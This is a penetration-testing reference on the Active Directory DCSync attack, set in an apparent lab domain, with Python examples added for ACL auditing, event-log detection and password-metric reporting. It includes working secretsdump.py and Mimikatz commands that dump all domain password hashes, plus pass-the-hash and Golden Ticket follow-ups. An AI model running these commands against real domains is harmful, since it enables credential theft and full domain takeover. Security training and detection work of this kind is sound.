
DCSync

DCSync abuses the Directory Replication Service Remote Protocol to mimic a Domain Controller and retrieve NTLM password hashes for all domain users. This is typically the final step in a domain compromise chain.

How DCSync Works

Domain Controllers replicate AD data between each other using the DS-Replication-Get-Changes-All extended right. DCSync requests a DC to replicate password data as if the attacker were another DC.

Required Permissions

The attacking account needs both of these extended rights on the domain object (DC=domain,DC=local):

  • Replicating Directory Changes (DS-Replication-Get-Changes)
  • Replicating Directory Changes All (DS-Replication-Get-Changes-All)

Accounts with these rights by default: Domain Admins, Enterprise Admins, default domain Administrator.

It is common to find non-admin accounts with these rights during assessments. If you have WriteDACL over the domain object, you can grant yourself these rights, perform DCSync, then remove them.

Verifying DCSync Rights

PowerView

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl

Look for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All both set to AccessAllowed for the target SID.
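The "both rights, both AccessAllowed" rule above is easy to apply by eye for one SID but tedious for a whole domain ACL. The following added example (not code from the page or from PowerView) turns it into an audit: it runs over ACE records shaped like PowerView's Get-ObjectAcl -ResolveGUIDs output (field names assumed), accepts the two rights either by resolved name or by raw rightsGuid, ignores deny ACEs and single-right holders, and reports every principal that could DCSync but is not one of the page's default holders. The domain SID is the one from the page; the ACE records are constructed.

```python
"""Audit the domain object's ACL for principals able to DCSync.

Added example, not from the page or PowerView: operates on ACE records shaped
like PowerView's Get-ObjectAcl -ResolveGUIDs output (field names assumed) and
on constructed records rather than a live directory.
"""
from collections import defaultdict

# The two extended rights DCSync needs, by resolved name and by rightsGuid.
GET_CHANGES = "DS-Replication-Get-Changes"
GET_CHANGES_ALL = "DS-Replication-Get-Changes-All"
RIGHT_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": GET_CHANGES,
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": GET_CHANGES_ALL,
}

DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"  # domain SID from the page
# Default holders named on the page: Administrator (500), Domain Admins (512),
# Enterprise Admins (519). Add further SIDs if your environment expects them.
DEFAULT_EXPECTED = {f"{DOMAIN_SID}-{rid}" for rid in ("500", "512", "519")}


def _right_name(ace):
    """Normalise ObjectAceType to a right name, whether resolved or a raw GUID."""
    raw = str(ace.get("ObjectAceType", "")).strip("{}").lower()
    return RIGHT_GUIDS.get(raw, ace.get("ObjectAceType"))


def find_dcsync_principals(aces, expected_sids=None):
    """Return SIDs granted BOTH replication rights that are not expected holders.

    Only AccessAllowed ACEs count; a principal holding just one of the two
    rights cannot DCSync and is not reported.
    """
    expected = DEFAULT_EXPECTED if expected_sids is None else set(expected_sids)
    allowed = defaultdict(set)
    for ace in aces:
        if ace.get("AceQualifier") != "AccessAllowed":
            continue  # deny ACEs grant nothing
        right = _right_name(ace)
        if right in (GET_CHANGES, GET_CHANGES_ALL):
            allowed[ace["SecurityIdentifier"]].add(right)
    return sorted(
        sid for sid, rights in allowed.items()
        if rights == {GET_CHANGES, GET_CHANGES_ALL} and sid not in expected
    )


def _ace(sid, qualifier, right):
    return {"SecurityIdentifier": sid, "AceQualifier": qualifier,
            "ObjectAceType": right, "ObjectDN": "DC=inlanefreight,DC=local"}


SAMPLE_ACES = [  # constructed records in PowerView's shape
    _ace(f"{DOMAIN_SID}-512", "AccessAllowed", GET_CHANGES),       # Domain Admins: expected
    _ace(f"{DOMAIN_SID}-512", "AccessAllowed", GET_CHANGES_ALL),
    _ace(f"{DOMAIN_SID}-1164", "AccessAllowed", GET_CHANGES),      # non-admin user with both rights
    _ace(f"{DOMAIN_SID}-1164", "AccessAllowed", GET_CHANGES_ALL),
    _ace(f"{DOMAIN_SID}-1205", "AccessAllowed", GET_CHANGES),      # one right only: cannot DCSync
    _ace(f"{DOMAIN_SID}-1300", "AccessAllowed",                    # same rights, unresolved GUIDs
         "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"),
    _ace(f"{DOMAIN_SID}-1300", "AccessAllowed",
         "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    _ace(f"{DOMAIN_SID}-1400", "AccessDenied", GET_CHANGES_ALL),   # denied, so not a holder
    _ace(f"{DOMAIN_SID}-1400", "AccessAllowed", GET_CHANGES),
]

if __name__ == "__main__":
    for sid in find_dcsync_principals(SAMPLE_ACES):
        print("unexpected DCSync-capable principal:", sid)
```

Domain controller groups (Domain Controllers, Enterprise Domain Controllers) legitimately hold these rights as well and will be reported unless added to expected_sids; the point of the audit is the list of principals that remain after the known holders are removed.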

PowerView — Check user context

Get-DomainUser -Identity adunn | select samaccountname,objectsid,memberof,useraccountcontrol | fl

BloodHound

Use the pre-built query “Find Principals with DCSync Rights”.

Performing DCSync from Linux

secretsdump.py (Impacket)

# Dump all hashes + Kerberos keys + cleartext passwords
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

# NTLM hashes only
secretsdump.py -outputfile hashes -just-dc-ntlm INLANEFREIGHT/adunn@172.16.5.5

# Single user only
secretsdump.py -just-dc-user administrator INLANEFREIGHT/adunn@172.16.5.5

# With NTLM hash authentication (pass-the-hash)
secretsdump.py -just-dc-ntlm -hashes :NTLM_HASH INLANEFREIGHT/adunn@172.16.5.5

Useful secretsdump.py Flags

Flag                    Purpose
-just-dc                Extract NTLM hashes, Kerberos keys, and cleartext passwords from NTDS
-just-dc-ntlm           NTLM hashes only
-just-dc-user <USER>    Extract data for a single user
-pwd-last-set           Show when each password was last changed
-history                Dump password history (useful for cracking metrics)
-user-status            Show whether accounts are disabled (filter for accurate reporting)
-outputfile <PREFIX>    Write output to files with the given prefix

Output Files

When combined with -outputfile <PREFIX>, the -just-dc flag produces three files:

File                    Contents
<prefix>.ntds           NTLM hashes (domain\user:rid:lmhash:nthash)
<prefix>.ntds.kerberos  Kerberos keys (DES, AES)
<prefix>.ntds.cleartext Cleartext passwords for accounts with reversible encryption

Performing DCSync from Windows

Mimikatz

Mimikatz must run in the context of a user with DCSync rights. Use runas.exe if needed:

runas /netonly /user:INLANEFREIGHT\adunn powershell

From the spawned session:

mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

This returns the NTLM hash and supplemental credentials for the specified user.

To dump all accounts:

mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /all /csv
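Whether the request comes from secretsdump.py or from Mimikatz, the DC sees the same thing: a replication request that exercises the two extended rights listed under Required Permissions. That is what a defender keys on. The following added example (not code from the page, Impacket or Mimikatz) runs over constructed Event ID 4662 records using the field names of the Security log's XML view (SubjectUserName, AccessMask, Properties, ObjectName) and flags control-access checks for either replication right made by any account that is not a known replication source. It assumes "Audit Directory Service Access" is enabled and that the domain object's SACL audits control-access checks, since otherwise no 4662 is written.

```python
"""Flag DCSync-style replication requests in Windows Security events.

Added example, not from the page or the tools it describes: the 4662 records
below are constructed and use the Security log XML field names. Assumes the
Directory Service Access audit subcategory is enabled.
"""
import re

# rightsGuids of the two replication extended rights, as they appear in the
# Properties field of a 4662 event.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
CONTROL_ACCESS = 0x100  # AccessMask bit for "Control Access" (extended rights)
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def _access_mask(event):
    """AccessMask is logged as a hex string such as 0x100; accept ints too."""
    mask = event.get("AccessMask", 0)
    return int(mask, 16) if isinstance(mask, str) else int(mask)


def is_replication_event(event):
    """True when a 4662 event records a control-access check for either right."""
    if event.get("EventID") != 4662:
        return False
    if _access_mask(event) & CONTROL_ACCESS == 0:
        return False
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return bool(guids & REPLICATION_GUIDS)


def detect_dcsync(events, replicating_accounts):
    """Return (subject, object) pairs for replication requests by accounts
    that are not known replication sources.

    replicating_accounts: SAM names allowed to replicate, normally the DC
    computer accounts (NAME$) plus any directory sync service account.
    """
    allowed = {a.lower() for a in replicating_accounts}
    hits = []
    for ev in events:
        if not is_replication_event(ev):
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in allowed:
            continue
        hits.append((f"{ev.get('SubjectDomainName', '')}\\{subject}",
                     ev.get("ObjectName", "")))
    return hits


DOMAIN_DN = "DC=inlanefreight,DC=local"
SAMPLE_EVENTS = [  # constructed records
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},      # DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},      # user account replicating
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectName": "CN=jsmith,CN=Users," + DOMAIN_DN, "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},      # ordinary read of a user object
    {"EventID": 4624, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "AccessMask": "0x0", "Properties": ""},                        # not a 4662 at all
]

if __name__ == "__main__":
    for subject, obj in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"possible DCSync: {subject} replicated {obj}")
```

The allowlist is the tuning point: DC computer accounts and any legitimate directory synchronisation service account replicate constantly and must be excluded, after which a human or service account exercising these rights is a high-confidence signal that matches the permission model described above.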

Reversible Encryption

Accounts with “Store password using reversible encryption” enabled store passwords encrypted with RC4 using the Syskey (extractable by Domain Admins). secretsdump.py automatically decrypts these.

Enumerate accounts with reversible encryption

# With Get-ADUser
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

# With PowerView
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol

This is rare but does occur. Some organizations enable it for periodic password audits. Passwords remain reversibly encrypted until the user changes their password after the setting is disabled.

Post-DCSync

With the domain Administrator NTLM hash or the krbtgt hash, you can:

  • Pass-the-Hash to any domain-joined system as Administrator
  • Create a Golden Ticket using the krbtgt hash for persistent domain access
  • Crack hashes offline for password strength metrics and reporting
  • Access any resource in the domain

Reporting Considerations

When providing password cracking statistics to clients, use the -user-status flag with secretsdump.py to filter out disabled accounts. Metrics should reflect only active accounts:

  • Number and percentage of passwords cracked
  • Top 10 most common passwords
  • Password length distribution
  • Password reuse across accounts
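The metrics listed above can be produced directly from the <prefix>.ntds file described under Output Files, provided disabled accounts are filtered out first. The following added example (not code from the page or from Impacket) parses constructed .ntds lines in the domain\user:rid:lmhash:nthash format, reads the trailing "(status=Enabled|Disabled)" annotation that -user-status appends (formatting assumed), drops disabled and machine accounts, joins the remaining NT hashes against a constructed cracked-password map standing in for a cracking tool's potfile, and reports cracked count and percentage, the most common passwords, the length distribution and hash reuse across active accounts. The hash values are placeholders, not real NT hashes.

```python
"""Active-account password metrics from a secretsdump .ntds file.

Added example, not from the page or Impacket: sample lines and the cracked
map are constructed; the "(status=...)" suffix is assumed to be what
-user-status appends; hash values are placeholders, not real NT hashes.
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^(?P<account>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32})"
    r"(?::::)?(?P<extra>.*)$",
    re.I,
)
STATUS_RE = re.compile(r"\(status=(\w+)\)")


def parse_ntds(text):
    """Yield one dict per hash line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        status = STATUS_RE.search(m["extra"])
        user = m["account"].split("\\")[-1]  # strip the DOMAIN\ prefix
        yield {
            "user": user,
            "rid": int(m["rid"]),
            "nt": m["nt"].lower(),
            # Without -user-status there is no annotation; treat as enabled.
            "enabled": status is None or status.group(1).lower() == "enabled",
            "machine": user.endswith("$"),
        }


def password_metrics(ntds_text, cracked, top_n=10):
    """Metrics over enabled, non-machine accounts only.

    cracked: mapping of NT hash -> recovered plaintext (potfile contents).
    """
    active = [a for a in parse_ntds(ntds_text) if a["enabled"] and not a["machine"]]
    by_hash = defaultdict(list)
    for a in active:
        by_hash[a["nt"]].append(a["user"])
    plaintexts = [cracked[a["nt"]] for a in active if a["nt"] in cracked]
    total = len(active)
    return {
        "active_accounts": total,
        "cracked": len(plaintexts),
        "cracked_pct": round(100.0 * len(plaintexts) / total, 1) if total else 0.0,
        "top_passwords": Counter(plaintexts).most_common(top_n),
        "length_distribution": dict(sorted(Counter(len(p) for p in plaintexts).items())),
        # Hash shared by more than one active account == password reuse,
        # whether or not the password was cracked.
        "reused_hashes": {h: sorted(u) for h, u in by_hash.items() if len(u) > 1},
    }


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
NT_A, NT_B, NT_C, NT_D, NT_E = ("a1" * 16, "b2" * 16, "c3" * 16, "d4" * 16, "e5" * 16)
SAMPLE_NTDS = "\n".join([  # constructed; placeholder hashes
    f"INLANEFREIGHT.LOCAL\\Administrator:500:{EMPTY_LM}:{NT_A}::: (status=Enabled)",
    f"INLANEFREIGHT.LOCAL\\krbtgt:502:{EMPTY_LM}:{NT_E}::: (status=Disabled)",
    f"INLANEFREIGHT.LOCAL\\adunn:1164:{EMPTY_LM}:{NT_B}::: (status=Enabled)",
    f"INLANEFREIGHT.LOCAL\\jsmith:1205:{EMPTY_LM}:{NT_B}::: (status=Enabled)",
    f"INLANEFREIGHT.LOCAL\\svc_backup:1300:{EMPTY_LM}:{NT_C}::: (status=Enabled)",
    f"INLANEFREIGHT.LOCAL\\old_user:1400:{EMPTY_LM}:{NT_C}::: (status=Disabled)",
    f"INLANEFREIGHT.LOCAL\\DC01$:1000:{EMPTY_LM}:{NT_D}::: (status=Enabled)",
])
SAMPLE_CRACKED = {NT_B: "Summer2024!", NT_C: "Password1"}  # constructed potfile

if __name__ == "__main__":
    for key, value in password_metrics(SAMPLE_NTDS, SAMPLE_CRACKED).items():
        print(f"{key}: {value}")
```

Note what the filtering changes: old_user shares a hash with svc_backup but is disabled, so it neither counts as cracked nor as reuse, and krbtgt and the DC01$ machine account are excluded as well. Without the status filter the same file would report five cracked out of seven and overstate the exposure.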